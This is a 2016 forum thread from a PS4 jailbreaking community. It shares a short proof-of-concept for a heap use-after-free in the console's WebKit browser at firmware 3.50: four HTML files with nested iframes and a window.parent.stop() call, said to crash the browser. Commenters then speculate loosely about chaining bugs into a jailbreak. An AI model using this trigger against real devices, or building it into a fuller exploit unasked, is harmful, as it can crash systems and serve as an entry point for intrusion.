PS4 Jailbreaking | Thread starter: PSXHAX | Start date: May 21, 2016 at 3:38 PM
Well, that didn't take long: since news of the PS4 WebKit exploit for 3.50 broke, PlayStation 4 developer Hunter128 has stepped up to the plate with a proof-of-concept for the heap use-after-free in WebCore 3.50! :)

Without further ado, here's what he had to say, to quote: Hello. Appears this needs to be posted publicly. Not sure who felt the need to want fame for this, cough "Qwerty", but that's the last time I am sharing something special like this.

Anyone hoping for advancements in the PS Vita scene, you can blame this guy for why, because I am no longer sharing anything.

Anywho, make an index.html:
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
        document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause an out-of-memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
[Image: PS4 Heap Use-After-Free At WebCore 3.50 PoC]

Comments

This method is easy; as I said earlier, the gap is there, while not one.
 
So, today... what kind of code could be injected, what kind of homebrews could be created based on these findings???

I don't know the PS4 system, so could someone please explain it? Please.
Thanks.
 
I think it is in this direction ->

Find a vuln -> If found, like the memory error -> Check if the vuln is exploitable -> If so, it's a good sign -> Next step: use an exploit for the vuln as an entry point -> entry point OK -> an exploit for userland is needed -> if found -> use the exploit for userland to gain kernel access -> now we have kernel access, but another exploit is needed to gain root or run our own code....

Just my thinking, it can be wrong; maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is OK....^^
This vulnerability is good; it does work with a few different ways I have tested so far. No need for code injection, and if you stay close to the original compiler you can literally crash the system and see the heap in memory and where the loc pointer should be directed.
Keep in mind I'm not just known for toolchains or kernels; I dig out the info for what's usable and how it can work to come together.
Some information
This is very close to ode rigid body moving objects simulation.
 
I'm new here.
Just a simple question.

What do the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What do the devs need for a CFW like Rebug, for example?
 
First of all, they need keys!!! To decrypt the firmware, change the files, and encrypt them again so that the PS4 recognizes the firmware as a valid one....

Correct me if I am wrong....
 